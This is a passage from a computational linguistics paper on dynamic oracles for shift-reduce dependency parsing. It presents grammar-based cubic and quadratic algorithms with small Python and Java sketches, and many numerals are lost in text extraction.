remaining input β, which is a suffix of the string 1 · · · n, and a set t of pairs (a, a′) of integers, with 0 ≤ a ≤ n and 1 ≤ a′ ≤ n. further, αβ is a subsequence of 0 1 · · · n, starting with 0. integer 0 represents an artificial input position, not corresponding to any actual token of an input sentence. an integer a′ (1 ≤ a′ ≤ n) occurs as second element of a pair (a, a′) ∈ t if and only if it does not occur in αβ. furthermore, for each a′ there is at most one a such that (a, a′) ∈ t. if (a, a′) ∈ t then a′ is generally called a dependent of a, but as we will frequently need concepts from graph theory in the remainder of this article, we will consistently call a′ a child of a and a the parent of a′; if a′ < a then a′ is a left child and if a < a′ then it is a right child. the terminology is extended in the usual way to include descendants and ancestors. pairs (a, a′) will henceforth be called edges.
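a small python sketch of these invariants, using a list of positions for α and β and a set of (parent, child) pairs for t; the concrete representation is an assumption made for illustration:

def is_valid_configuration(stack, buffer, edges, n):
    # check the invariants stated above for a configuration (stack, buffer, edges)
    # of a sentence of length n
    seq = list(stack) + list(buffer)
    if not seq or seq[0] != 0:
        return False          # the stack must start with the artificial root 0
    if seq != sorted(seq) or len(set(seq)) != len(seq):
        return False          # stack followed by input is a subsequence of 0..n
    if any(not 0 <= a <= n for a in seq):
        return False
    children = [c for (_, c) in edges]
    if len(children) != len(set(children)):
        return False          # at most one parent per position
    # a position has a parent exactly when it no longer occurs in stack or input
    return set(children) == set(range(1, n + 1)) - set(seq)

print(is_valid_configuration([0], [1, 2, 3, 4], set(), 4))            # True (initial)
print(is_valid_configuration([0, 2], [3, 4], {(2, 1)}, 4))            # True
print(is_valid_configuration([0, 2], [3, 4], {(2, 1), (3, 1)}, 4))    # False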
for sentence length n, the initial configuration is ( , · · · n,∅), and a final configuration is shift: (α, bβ, t) ` (αb, β, t) reduce left: (αa a , β, t) ` (αa , β, t ∪{(a ,a )}) reduce right: (αa a , β, t) ` (αa , β, t ∪{(a ,a )}), provided |α| > table : shift-reduce dependency parsing. of the form ( ,ε,t), where ε denotes the empty string. the three transitions of shift-reduce de- pendency parsing are given in table . by step we mean the application of a transition on a particular configuration. by computation we mean a series of steps, the formal notation of which uses `∗, the reflexive, transition closure of `. if ( , · · · n,∅) `∗ ( ,ε,t), then t represents a tree, with as root element, and t is projective, which means that for each node, the set of its descendants (including that node itself) is of the form {a,a + , . . . ,a′− ,a′}, for some a and a′. in general, a dependency tree is any tree of nodes labelled , , . . . , n, with being the root. the score of a tree t for a sentence is the number of edges that it has in common with a given gold tree tg for that sentence, or formally |t ∩tg|. the accuracy is the score divided by n. note that neither tree need be projective for the score to be defined, but in this paper the first tree, t , will normally be projective. where indicated, also tg is assumed to be projective. assume an arbitrary configuration (α,β,t) for sentence length n and assume a gold tree tg for a sentence of that same length, and as- sume three steps (α,β,t) ` (αi,βi,ti), with i = , , , obtainable by a shift, reduce left or reduce right, respectively. (if β = ε, or |α| ≤ , then naturally some of the three transitions need to be left out of consideration.) we now wish to calculate, for each of i = , , , the maximum value of |t ′i ∩tg|, for any t ′ i such that (αi,βi,ti) `∗ ( ,ε,t ′i ). for i = , , , let σi be this maximum value. the absolute scores σi are strictly speaking irrelevant; the relative values determine which is the optimal step, or which are the optimal steps, to reach a tree with the highest score. note that |{i | σi = maxj σj}| is either , , or . in the remainder of this article, we find it more convenient to calculate σi −|t ∩tg| for each i—or, in other words, gold edges that were previously found are left out of consideration. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april we can put restrictions on the set of allowable computations (α,β,t) `∗ ( ,ε,t ∪ t ′). the left-before-right strategy demands that all edges (a,a′) ∈ t ′ with a′ < a are found before any edges (a,a′) ∈ t ′ with a < a′, for each a that is rightmost in α or that occurs in β. the strict left- before-right strategy in addition disallows edges (a,a′) ∈ t ′ with a′ < a for each a in α other than the rightmost element. the intuition is that a non-strict strategy allows us to correct mistakes already made: if we have already pushed other elements on top of a stack element a, then a will necessarily obtain right children before it occurs on top of the stack again, when it can take (more) left children. by contrast, the strict strategy would not allow these left children. the definition of the right-before-left strategy is symmetric to that of the left-before-right strategy, but there is no independent strict right-before- left strategy. in this paper we consider all three strategies in order to emphasize the power of our framework. it is our understanding that goldberg et al. ( ) does not commit to any particular strategy. 
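to make the preliminaries concrete, the three transitions and the score |t ∩ tg| can be sketched in python as follows; the guard on reduce right is written here as requiring a non-empty α, i.e., the artificial root 0 is never given a parent, which is how we read the condition whose bound was lost above (it matches the later remark that no reduce right is applicable on a two-element stack):

def shift(stack, buffer, edges):
    # (alpha, b beta, T)  |-  (alpha b, beta, T)
    return stack + [buffer[0]], buffer[1:], set(edges)

def reduce_left(stack, buffer, edges):
    # (alpha a1 a2, beta, T)  |-  (alpha a1, beta, T ∪ {(a1, a2)}):
    # the top of the stack is popped and becomes a child of the element below it
    a1, a2 = stack[-2], stack[-1]
    return stack[:-1], buffer, set(edges) | {(a1, a2)}

def reduce_right(stack, buffer, edges):
    # (alpha a1 a2, beta, T)  |-  (alpha a2, beta, T ∪ {(a2, a1)}), alpha non-empty:
    # the element below the top is removed and becomes a child of the top
    assert len(stack) > 2, "reduce right needs a non-empty alpha below a1 a2"
    a1, a2 = stack[-2], stack[-1]
    return stack[:-2] + [a2], buffer, set(edges) | {(a2, a1)}

def score(edges, gold_edges):
    # number of predicted edges shared with the gold tree, |T ∩ Tg|
    return len(set(edges) & set(gold_edges))

# toy run for n = 3
config = ([0], [1, 2, 3], set())
for step in (shift, shift, reduce_left, shift, reduce_left, reduce_left):
    config = step(*config)
print(config)   # stack [0], empty input, edges {(1, 2), (1, 3), (0, 1)}
print(score(config[2], {(0, 1), (1, 2), (3, 1)}))   # 2 edges agree with this gold tree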
tabular dependency parsing we here consider context-free grammars (cfgs) of a special form, with nonterminals in n ∪(n`× nr), for appropriate finite sets n, n`, nr, which need not be disjoint. the finite set of terminals is denoted Σ. there is a single start symbol s ∈ n. rules are of one of the forms: • (b,c) → a, • a → (b,c), • (b′,c) → a (b,c), • (b,c′) → (b,c) a, where a ∈ n, b,b′ ∈ n`, c,c′ ∈ nr, a ∈ Σ. a first additional requirement is that if (b′,c) → a (b,c) is a rule, then (b′,c′) → a (b,c′), for any c′ ∈ nr, is also a rule, and if (b,c′) → (b,c) a is a rule, then (b′,c′) → (b′,c) a, for any b′ ∈ n`, is also a rule. this justifies our notation of such rules in the remainder of this paper as (b′, ) → a (b, ) and ( ,c′) → ( ,c) a, respectively. these two kinds of rules correspond to attachment of left and right children, respectively, in dependency parsing. secondly, we require that there is precisely one rule (b,c) → a for each a ∈ Σ. w`(b,i,i) = { , if (b,c) → ai , otherwise wr(c,i,i) = { , if (b,c) → ai , otherwise w`(b,c,i,j) = ⊕ k wr(b,i,k)⊗ w`(c,k + ,j) ⊗w(j,i) wr(b,c,i,j) = ⊕ k wr(b,i,k)⊗ w`(c,k + ,j) ⊗w(i,j) w`(c ′, i,j) = ⊕ a→(d,b), (c′, )→a (c, ), k w`(d,i,k) ⊗w`(b,c,k,j) wr(b ′, i,j) = ⊕ ( ,b′)→( ,b) a, a→(c,d), k wr(b,c,i,k) ⊗wr(d,k,j) w = ⊕ s→(b,c) w`(b, , ) ⊗wr(c, ,n) table : weighted parsing, for an arbitrary semi- ring, with ≤ i < j ≤ n. note that the additional requirements make the grammar explicitly ‘‘split’’ in the sense of eisner and satta ( ), eisner ( ), and johnson ( ). that is, the two processes of attaching left and right children, respectively, are independent, with rules (b,c) → a creating ‘‘initial states’’ b and c, respectively, for these two processes. rules of the form a → (b,c) then combine the end results of these two processes, possibly placing constraints on allowable combinations of b and c. to bring out the relation between our subclass of cfgs and bilexical grammars, one could ex- plicitly write (b,c)(a) → a, a(a) → (b,c)(a), (b′, )(b) → a(a) (b, )(b), and ( ,c′)(c) → ( ,c)(c) a(a). purely symbolic parsing is extended to weighted parsing much as usual, except that instead of attaching weights to rules, we attach a score w(i,j) to each pair (i,j), which is a potential edge. this can be done for any semiring. in the semiring we will first use, a value is either a non-negative integer or −∞. further, w ⊕w = max(w ,w ) and w ⊗w = w + w if w = −∞ and w = −∞ and w ⊗w = −∞ otherwise. naturally, the identity element of ⊕ is = −∞ and the identity element of ⊗ is = . tabular weighted parsing can be realized following eisner and satta ( ). we assume the input is a string a a · · ·an ∈ Σ∗, with a being the prospective root of a tree. table presents the cubic-time algorithm in the form of a system of recursive equations. with the semiring we chose above, w`(b,i,j) represents the highest score of any right-most derivation of the form (b, ) ⇒ a (b , ) ⇒ a a (b , ) ⇒∗ downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april (s,s) → a s → (s,s) ( ,s) → ( ,s) s (s, ) → s (s, ) table : grammar for projective dependency parsing, with Σ = {a} and n = n` = nr = {s}. figure : dependency structure and corresponding parse tree that encodes a computation of a shift-reduce parser. a · · ·am(bm, ) ⇒ a · · ·amaj ⇒∗ ai · · ·aj, for some m ≥ , and wr(c,i,j) has symmetric meaning. intuitively, w`(b,i,j) considers aj and its left dependents and wr(c,i,j) considers ai and its right dependents. 
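a minimal python rendering of the semiring just described, with ⊕ = max (identity −∞) and ⊗ = + (identity 0, with −∞ absorbing); packaging it as a small record, to emphasize that the tabular algorithm is parameterized by an arbitrary semiring, is an illustrative choice rather than part of the paper:

from dataclasses import dataclass
from typing import Any, Callable

@dataclass(frozen=True)
class Semiring:
    # oplus combines alternative derivations, otimes combines parts of one derivation
    oplus: Callable[[Any, Any], Any]
    otimes: Callable[[Any, Any], Any]
    zero: Any   # identity of oplus, absorbing for otimes
    one: Any    # identity of otimes

NEG_INF = float("-inf")

# the semiring used above: values are scores, oplus = max, otimes = +
max_plus = Semiring(
    oplus=max,
    otimes=lambda a, b: NEG_INF if NEG_INF in (a, b) else a + b,
    zero=NEG_INF,
    one=0,
)

# best total score over two alternative derivations, of weights 1 + 1 and 1 + (-inf)
print(max_plus.oplus(max_plus.otimes(1, 1), max_plus.otimes(1, NEG_INF)))   # 2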
a value w`(b,c,i,j), or wr(b,c,i,j), represents the highest score combining ai and its right dependents and aj and its left dependents, meeting in the middle at some k, including also an edge from ai to aj, or from aj to ai, respectively. one may interpret the grammar in table as encoding all possible computations of a shift- reduce parser, and thereby all projective trees. as there is only one way to instantiate the under- scores, we obtain rule (s,s) → (s,s) s, which corresponds to reduce left, and rule (s,s) → s (s,s), which corresponds to reduce right. figure presents a parse tree for the grammar and the corresponding dependency tree. note that if we are not given a particular strategy, such as left-before-right, then the parse tree underspec- ifies whether left children or right children are attached first. this is necessarily the case because the grammar is split. therefore, the computation in this example may consist of three shifts, fol- lowed by one reduce left, one reduce right, and one reduce left, or it may consist of two shifts, one reduce right, one shift, and two reduce lefts. (p,p) → p (s,s) → s p → (p,p) s → (p,s) s → (s,s) (s, ) → p (s, ) (s, ) → s (s, ) ( ,s) → ( ,p) s ( ,s) → ( ,s) s (s, ) → p (p, ) table : grammar for dependency parsing of pksm+ , representing a stack of length k + and remaining input of length m, with Σ = {p,s}, n = nr = n` = {p,s}. the last rule would be excluded for the strict left-to-right strategy, or alternatively one can set w(i,j) = −∞ for j < i < k. for a given gold tree tg, which may or may not be projective, we let w(i,j) = δg(i,j), where we define δg(i,j) = if (i,j) ∈ tg and δg(i,j) = otherwise. with the grammar from table , the value w found by weighted parsing is now the score of the most accurate projective tree. by backtracing from w as usual, we can construct the (or more correctly, a) tree with that highest accuracy. we have thereby found an effective way to projectivize a treebank in an optimal way. by a different semiring, we can count the number of trees with the highest accuracy, which reflects the degree of ‘‘choice’’ when projectivizing a treebank. o(n )o(n )o(n ) time algorithm in a computation starting from a configuration (a · · ·ak,b · · ·bm,t), not every projective parse of the string a · · ·akb · · ·bm is achievable. the structures that are achievable are captured by the grammar in table , with p for prefix and s for suffix (also for ‘‘start symbol’’). nonterminals p and (p,p) correspond to a node ai ( ≤ i < k) that does not have children. nonterminal s corresponds to a node that has either ak or some bj ( ≤ j ≤ m) among its descendants. this then means that the node will appear on top of the stack at some point in the computation. nonterminal (s,s) also corresponds to a node that has one of the rightmost m + nodes among its descendants, and, in addition, if it itself is not one of the rightmost m + nodes, then it must have a left child. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : dependency structure and corresponding parse tree, for stack of height and remaining input of length . nonterminal (p,s) corresponds to a node ai ( ≤ i < k) that has ak among its descendants but that does not have a left child. nonterminal (s,p) corresponds to a node ai ( ≤ i < k) that has a left child but no right children. for ai to be given a left child, it is required that it eventually appear on top of the stack. 
this requirement is encoded in the absence of a rule with right-hand side (s,p). in other words, (s,p) cannot be part of a successful derivation, unless the rule (s,s) → (s,p) s is subsequently used, which then corresponds to giving ai a right child that has ak among its descendants. figure shows an example. note that we can partition a parse tree into ‘‘columns’’, each con- sisting of a path starting with a label in n, then a series of labels in n` × nr and ending with a label in Σ. a dependency structure that is not achievable, and that appropriately does not correspond to a parse tree, for a stack of height and remaining input of length , is: • • • • | • suppose we have a configuration (a · · ·ak, b · · ·bm,t) for sentence length n, which implies k + m ≤ n. we need to decide whether a shift, reduce left, or reduce right should be done in order to achieve the highest accuracy, for given gold tree tg. for this, we calculate three values σ , σ and σ , and determine which is highest. the first value σ is obtained by investigat- ing the configuration (a · · ·akb ,b · · ·bm,∅) resulting after a shift. we run our generic tab- ular algorithm for the grammar in table , for input pk+ sm, to obtain σ = w . the scores are obtained by translating indices of a · · · akb · · ·bm = c · · ·ck+m to indices in the orig- inal input, that is, we let w(i,j) = δg(ci,cj). however, the shift, which pushes an element on top of ak, implies that ak will obtain right children before it can obtain left children. if we assume the left-before-right strategy, then we should avoid that ak obtains left children. we could do that by refining the grammar, but find it easier to set w(k,i) = −∞ for all i < k. for the second value σ , we investigate the con- figuration (a · · ·ak− ,b · · ·bm,∅) resulting after a reduce left. the same grammar and algorithm are used, now for input pk− sm+ . with a · · · ak− b · · ·bm = c · · ·ck+m− , we let w(i,j) = δg(ci,cj). we let σ = w ⊗ δg(ak− ,ak). in case of a strict left-before-right strategy, we set w(k − , i) = −∞ for i < k − , to avoid that ak− obtains left children after having obtained a right child ak. if k ≤ then the third value is σ = −∞, as no reduce right is applicable. otherwise we investigate (a · · ·ak− ak,b · · ·bm,∅). the same grammar and algorithm are used as before, and w(i,j) = δg(ci,cj) with a · · ·ak− akb · · ·bm = c · · ·ck+m− . now σ = w ⊗ δg(ak,ak− ). in case of a right-before-left strategy, we set w(k,i) = −∞ for k < i. we conclude that the time complexity of cal- culating the optimal step is three times the time complexity of the algorithm of table , hence cubic in n. for a proof of correctness, it is sufficient to show that each parse tree by the grammar in table corresponds to a computation with the same score, and conversely that each computation corresponds to an equivalent parse tree. our grammar has spurious ambiguity, just as the shift-reduce parser from table , and this can be resolved in the same way, depending on whether the intended strategy is (non-)strict left-before-right or right- before-left, and whether the configuration is the result of a shift, reduce left, or reduce right. concretely, we can restrict parse trees to attach children lower in the tree if they would be attached earlier in the computation, and thereby we obtain downloaded from http://www.mitpressjournals.org/doi/pdf/ . 
/tacl_a_ by carnegie mellon university user on april figure : a node ν with label in n` ×nr translates to configuration (d̄ · · · d̄k′, ē · · · ēm′,t), via its shortest path to the root. the overlined symbols denote the integers between and n corresponding to d · · · dk′e · · ·em′ ∈ p+s∗. a bijection between parse trees and computations. for example, in the middle column of the parse tree in figure , the (p,s) and its right child occur below the (s,s) and its left child, to indicate the reduce left precedes the reduce right. the proof in one direction assumes a parse tree, which is traversed to gather the steps of a computation. this traversal is post-order, from left to right, but skipping the nodes representing stack elements below the top of the stack, starting from the leftmost node labeled s. each node ν with a label in n` × nr corresponds to a step. if the child of ν is labeled s, then we have a shift, and if it has a right or left child with a label in n, then it corresponds to a reduce left or reduce right, respectively. the configuration resulting from that step can be constructed as sketched in figure . we follow the shortest path from ν to the root. all the leaves to the right of the path correspond to the remaining input. for the stack, we gather the leaves in the columns of the nodes on the path, as well as those of the left children of nodes on the path. compare this with the concept of right-sentential forms in the theory of context-free parsing. for a proof in the other direction, we can make use of existing parsing theory, which tells us how to translate a computation of the shift-reduce parser to a dependency structure, which in turn is easily translated to an undecorated parse tree. it then remains to show that the nodes in that tree can be decorated (in fact in a unique way), according to the rules from table . this is straightforward given the meanings of p and s described earlier in this section. most notably, the absence of a rule figure : components c , c , c partitioning nodes in β, and gold edges linking them to α. with right-hand side ( ,p) p does not prevent the decoration of a tree that was constructed out of a computation, because a reduction involving two nodes within the stack is only possible if the rightmost of these nodes eventually appears on top of the stack, which is only possible when the computation has previously made ak a descendant of that node, hence we would have s rather than p . o(n o(n o(n ) time algorithm assume a given configuration (α,β,t) as before, resulting from a shift or reduction. let α = a · · ·ak, a = {a , . . . ,ak}, and let b be the set of nodes in β. we again wish to calculate the maximum value of |t ′ ∩tg| for any t ′ such that (α,β,∅) `∗ ( ,ε,t ′), but now under the assumption that tg is projective. let us call this value σmax . we define w in terms of δg as in the previous section, setting w(i,j) = −∞ for an appropriate subset of pairs (i,j) to enforce a strategy that is (non-)strict left-before-right or right-before-left. the edges in tg ∩ (b × b) partition the re- maining input into maximal connected compo- nents. within these components, a node b ∈ b is called critical if it satisfies one or both of the following two conditions: • at least one descendant of b (according to tg) is not in b. • the parent of b (according to tg) is not in b. let bcrit ⊆ b be the set of critical nodes, listed in order as b , . . . ,bm, and let bncrit = b \bcrit . figure sketches three components as well as edges in tg ∩ (a×b) and tg ∩ (b ×a). 
com- ponent c , for example, contains the critical elements b , b , and b . the triangles under b , . . . , b represent subtrees consisting of edges leading to non-critical nodes. for each b ∈ bcrit , |tg ∩ ({b}× a)| is zero or more, or in words, downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april critical nodes have zero or more children in the stack. further, if (a,b) ∈ tg ∩ (a × bcrit ), then b is the rightmost critical node in a component; examples are b and b in the figure. let tmax be any tree such that (α,β,∅) `∗ ( ,ε,tmax ) and |tmax ∩tg| = σmax . then we can find another tree t ′max that has the same properties and in addition satisfies: . tg ∩ (b ×bncrit ) ⊆ t ′max , . t ′max ∩ (bncrit ×a) = ∅, . t ′max ∩ (b ×bcrit ) ⊆ tg, or in words, ( ) the subtrees rooted in the critical nodes are entirely included, ( ) no child of a non-critical node is in the stack, and ( ) within the remaining input, all edges to critical nodes are gold. very similar observations were made before by goldberg et al. ( ), and therefore we will not give full proofs here. the structure of the proof is in each case that all violations of a property can be systematically removed, by rearranging the computation, in a way that does not decrease the score. we need two more properties: . if (a,b) ∈ t ′max ∩ (a × bcrit ) \ tg then either: • b is the rightmost critical node in its component, or • there is (b,a′) ∈ t ′max ∩ tg, for some a′ ∈ a and there is at least one other critical node b′ to the right of b, but in the same component, such that (b′,a′′) ∈ t ′max ∩ tg or (a′′,b′) ∈ t ′max ∩ tg, for some a′′ ∈ a. . if (b,a) ∈ t ′max ∩(bcrit ×a) \ tg then there is (b,a′) ∈ t ′max , for some a′ ∈ a, such that a′ is a sibling of a immediately to its right. figure , to be discussed in more detail later, illustrates property ( ) for the non-gold edge from a ; this edge leads to b (which has outgoing gold edge to a ) rather than to b or b . it further respects property ( ) because of the gold edges connected to b and b , which occur to the right of b but in the same component. property ( ) is illustrated for the non-gold edge from b to a , which has sibling a immediately to the right. the proof that property ( ) may be assumed to hold, without loss of generality, again involves figure : counting additional gold edges in a×bcrit ∪ bcrit ×a. gold edges are thick, others are thin. gold edges that are not created appear dotted. making local changes to the computation, in particular replacing the b in an offending non- gold edge (a,b) ∈ a × bcrit by another critical node b′ further to the left or at the right end of the component. similarly, for property ( ), if we have an offending non-gold edge (b,a), then we can rearrange the computation, such that node a is reduced not into b but into one of the descendants of b in b that was given children in a. if none of the descendants of b in b was given children in a, then a can instead be reduced into its neighbor in the stack immediately to the left, without affecting the score. by properties ( )–( ), we can from here on ignore non-critical nodes, so that the remaining task is to calculate σmax −|bncrit|. in fact, we go further than that and calculate σmax − m, where m = |tg ∩ (b × b)|. in other words, we take for granted that the score can be at least as much as the number of gold edges within the remaining input, which leaves us with the task of counting the additional gold edges in the optimal computation. 
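before turning to the counting itself, the notion of critical nodes is concrete enough to spell out in code. the following is a minimal sketch in java (the implementation language mentioned in the experiments section below); the head-array encoding of the gold tree, the representation of b as a set of token positions, and all names are assumptions made for illustration rather than details taken from this paper.

import java.util.*;

// hedged sketch, not code from the paper: identifying the critical nodes of the
// remaining input, given the gold tree as a head array (head[t] = parent of token t,
// -1 for the root) and b as the set of remaining-input positions.
public final class CriticalNodes {

    // a position of b is critical if its gold parent lies outside b,
    // or if at least one of its gold descendants lies outside b.
    public static SortedSet<Integer> criticalNodes(int[] head, Set<Integer> b) {
        SortedSet<Integer> crit = new TreeSet<>();
        for (int x : b) {
            if (head[x] < 0 || !b.contains(head[x])) crit.add(x);   // parent outside b
        }
        for (int x = 0; x < head.length; x++) {
            if (b.contains(x)) continue;
            // x lies outside b, so every ancestor of x inside b has a descendant outside b
            for (int a = head[x]; a >= 0; a = head[a]) {
                if (b.contains(a)) crit.add(a);
            }
        }
        return crit;
    }

    public static void main(String[] args) {
        int[] head = {-1, 0, 3, 4, 0, 4};   // toy projective gold tree over 6 tokens
        Set<Integer> b = new HashSet<>(Arrays.asList(3, 4, 5));   // remaining input
        System.out.println(criticalNodes(head, b));   // prints [3, 4]
    }
}

on the toy tree, exactly those positions are marked whose gold parent or some gold descendant falls outside the remaining input.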
for any given component c we can consider the sequence of edges that the computation creates between a and c, in the order in which they are created: • for the first gold edge between c and a, we count + , • for each subsequent gold edge between c to a, we count + , • we ignore interspersed non-gold edges from c to a, • but following a non-gold edge from a to c, the immediately next gold edge between c and a is not counted, because that non- gold edge implies that another gold edge in bcrit ×bcrit cannot be created. this is illustrated by figure . for (b ,a ) we count + , it being the first gold edge connected downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april to the component. for the subsequent three gold edges, we count + for each, ignoring the non- gold edge (b ,a ). the non-gold edge (a ,b ) implies that the parent of b is already determined. one would then perhaps expect we count − for non-creation of (b ,b ), considering (b ,b ) was already counted as part of m. instead, we let this − cancel out against the following (b ,a ), by letting the latter contribute + rather than + . the subsequent edge (b ,a ) again contributes + , but the non-gold edge (a ,b ) means that the subsequent (a ,b ) contributes + . hence the net count in this component is . the main motivation for properties ( )–( ) is that they limit the input positions that can be relevant for a node that is on top of the stack, thereby eliminating one factor m from the time complexity. more specifically, the gold edges relate a stack element to a ‘‘current critical node’’ in a ‘‘current component’’. we need to distinguish however between three possible states: • n (none): none of the critical nodes from the current component were shifted on to the stack yet, • c (consumed): the current critical node was ‘consumed’ by it having been shifted and assigned a parent, • f (fresh): the current critical node was not consumed, but at least one of the preceding critical nodes in the same component was consumed. for ≤ i ≤ k, we define p(i) to be the index j such that (bj,ai) ∈ tg, and if there is no such j, then p(i) = ⊥, where ⊥ denotes ‘undefined’. for ≤ i < k, we let p≥(i) = p(i) if p(i) = ⊥, and p≥(i) = p≥(i + ) otherwise, and further p≥(k) = p(k). intuitively, we seek a critical node that is the parent of ai, or if there is none, of ai+ , . . . we define c(i) to be the smallest j such that (ai,bj) ∈ tg, or in words, the index of the leftmost child in the remaining input, and c(i) = ⊥ if there is none. as representative element of a component with critical element bj we take the critical element that is rightmost in that component, or formally, we define r(j) to be the largest j′ such that bj′ is an ancestor (by tg ∩ (bcrit × bcrit )) of bj. for completeness, we define r(⊥) = ⊥. we let p(i) = r(p(i)) and p≥(i) = r(p≥(i)). note that score(i,j,q) = if i < , otherwise: score(i,j,q) = [nchildren(i)−∆(c(i) = p≥(j) ∧q = n)]⊗ w(i,j) ⊗score(i− , i,τ(i,j,q)) ⊕ w(j,i) ⊗score(i− ,j,q) ⊕ [if p(j) = ⊥∨ q = c then −∞ else ∆(q = n) ⊗score′(i,p(j))] score′(i,j) = if i < , otherwise: score′(i,j) = [if p′(i,j) = ⊥ then score′(i− ,j) else ⊗score′(i− ,p′(i,j))] ⊕ nchildren(i) ⊗score(i− , i,τ ′(i,j)) nchildren(i) = |{j | w(i,j + k) = }| τ(i,j,q) = if q = n ∨p≥(i) = p≥(j) then n else if p≥(i) = p≥(j) then f else q τ ′(i,j) = if p≥(i) = r(j) then n else if p≥(i) = j then f else c table : quadratic-time algorithm. r(c(i)) = c(i) for each i. 
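the bookkeeping functions p, p≥, c and r just defined (p′ follows below) lend themselves to a straightforward precomputation. the sketch below is a hedged illustration only: the 1-based arrays for a · · · ak and b · · · bm, the head-array encoding of the gold tree, and the use of -1 for ⊥ are assumptions, and p≥ is read according to the stated intuition, namely the critical parent of ai or, failing that, the value for ai+1.

import java.util.*;

// hedged sketch, not code from the paper: tabulating p, p>=, c and r for the
// quadratic-time recursion. assumed encoding: headOf[t] is the gold parent of
// token t (-1 for the root); stack[1..k] holds a1..ak and crit[1..m] holds the
// critical nodes b1..bm in left-to-right order; -1 stands for "undefined".
public final class OracleTables {
    final int[] p;     // p[i]   : j such that b_j is the gold parent of a_i, else -1
    final int[] pGeq;  // pGeq[i]: p[i] if defined, otherwise the value for i+1
    final int[] c;     // c[i]   : smallest j such that a_i is the gold parent of b_j, else -1
    final int[] r;     // r[j]   : topmost (and hence rightmost) critical ancestor of b_j

    OracleTables(int[] headOf, int[] stack, int[] crit, int k, int m) {
        p = new int[k + 2]; pGeq = new int[k + 2]; c = new int[k + 2]; r = new int[m + 1];
        Arrays.fill(p, -1); Arrays.fill(c, -1);

        Map<Integer, Integer> critIndex = new HashMap<>();    // token -> index among b1..bm
        for (int j = 1; j <= m; j++) critIndex.put(crit[j], j);

        for (int i = 1; i <= k; i++) {
            Integer j = critIndex.get(headOf[stack[i]]);      // parent of a_i among critical nodes
            if (j != null) p[i] = j;
            for (int jj = 1; jj <= m && c[i] < 0; jj++)       // leftmost critical child of a_i
                if (headOf[crit[jj]] == stack[i]) c[i] = jj;
        }
        pGeq[k + 1] = -1;                                     // right-to-left pass for p>=
        for (int i = k; i >= 1; i--) pGeq[i] = (p[i] >= 0) ? p[i] : pGeq[i + 1];

        for (int j = 1; j <= m; j++) {                        // walk up gold edges between critical nodes
            int cur = j;
            for (Integer up = critIndex.get(headOf[crit[cur]]); up != null;
                 up = critIndex.get(headOf[crit[cur]])) cur = up;
            r[j] = cur;
        }
        // the representatives written with an overline in the text are then
        // r[p[i]] and r[pGeq[i]], whenever p[i] and pGeq[i] are defined.
    }
}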
for ≤ i ≤ k and ≤ j ≤ m, we let p′(i,j) = p(i) if p(i) = r(j) and p′(i,j) = ⊥ otherwise; or in words, p′(i,j) is the index of the parent of ai in the remaining input, provided it is in the same component as bj. table presents the algorithm, expressed as system of recursive equations. here score(i,j,q) represents the maximum number of gold edges (in addition to m) in a computation from (a · · ·aiaj,b` · · ·bk,∅), where ` depends on the state q ∈ {n ,c,f}. if q = n , then ` is the smallest number such that r(`) = p≥(j); critical nodes from the current component were not yet shifted. if q = c, then ` = p≥(j) + or ` = p≥(j) + ; this can be related to the two cases distinguished by property ( ). if q = f, then ` is greater than the smallest number such that r(`) = p≥(j), but smaller than or equal to p≥(j) or equal to ` = p≥(j) + . similarly, score′(i,j) represents the maximum number of gold edges in a computation from (a · · ·aibj,bj+ · · ·bk,∅). for i ≥ , the value of score(i,j,q) is the maximum (by ⊕) of three values. the first corresponds to a reduction of aj into ai, which turns the stack into a · · ·ai− ai; this would also include shifts of any remaining right children of ai, if there are any, and their reduction into ai. because there is a new top-of-stack, the state is updated using τ. the function nchildren counts the critical nodes that are children of ai. we define nchildren in terms of w rather than tg, as in the case of the right-before-left strategy downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : graphical representation of the first value in the definition of score, for the case q = f, assuming c(i) = p≥(j) = ` and ai further has children b`+ and b`+ . because q = f, there was some other node b`′ in the same component that was shifted on to the stack earlier and given a (non-gold) parent; let us assume `′ = ` − . we can add children to the score, but should subtract ∆(c(i) = p≥(j) ∧ q = n) = , to compensate for the fact that edge (b`,b`− ) cannot be constructed, as b`− can only have one parent. if we further assume ai has a parent among the critical nodes, then that parent must be in a different component, and therefore τ(i,j,q) = n . after a reduce right we would preclude right children of ak by setting w(k,i) = −∞ for k < i. the leftmost of the children, at index c(i), is not counted (or in other words, is subtracted from the number of children) if it is in the current component p≥(j) and that component is anything other than ‘none’; here ∆ is the indicator function, which returns if its boolean argument evaluates to true, and otherwise. figure illustrates one possible case. the second value corresponds to a reduction of ai into aj, which turns the stack into a · · ·ai− aj, leaving the state unchanged as the top of the stack is unchanged. the third value is applicable if aj has parent b` that has not yet been consumed, and it corresponds to a shift of b` and a reduction of ai into b` (and possibly further shifts and reductions that are implicit), resulting in stack a · · ·aib`. if this creates the first gold edge connected to the current component, then we add + . for i ≥ , the value of score′(i,j) is the max- imum of two values. the first value distinguishes two cases. in the first case, ai does not have a parent in the same component as bj, and ai is reduced into bj without counting the (non-gold) edge. 
in the second case, ai is reduced into its par- ent, which is bj or another critical node that is an ancestor of bj; in this case we count the gold edge. the second value in the definition of score′(i,j) corresponds to a reduction of bj into ai (as well as shifts of any critical nodes that are children of ai, and their reduction into ai), resulting in stack figure : assuming the thick edges are gold, then the thin edge cannot be gold as well, as the gold tree is projective. a score obtained from a stack a · · ·ai− ai is therefore at least as high as a score obtained from a stack a · · ·ai− aj , unless all of a`′+ , . . . , ai first become children of aj via a series of reduce right steps, all producing non-gold edges, and therefore adding nothing to the score. the κ function implements such a series of reduce right steps. a · · ·ai− ai. the state is updated using τ ′, in the light of the new top-of-stack. the top-level call is score(k − ,k,n). as this does not account for right children of the top of stack ak, we need to add nchildren(k). putting everything together, we have σmax = m ⊗ score(k − ,k,n) ⊗ nchildren(k). the time complexity is quadratic in k + m ≤ n, given the quadratically many combinations of i and j in score(i,j,q) and score′(i,j). o(n)o(n)o(n) time algorithm under the same assumption as in the previous sec- tion, namely, that tg is projective, we can further reduce the time complexity of computing σmax , by two observations. first, let us define 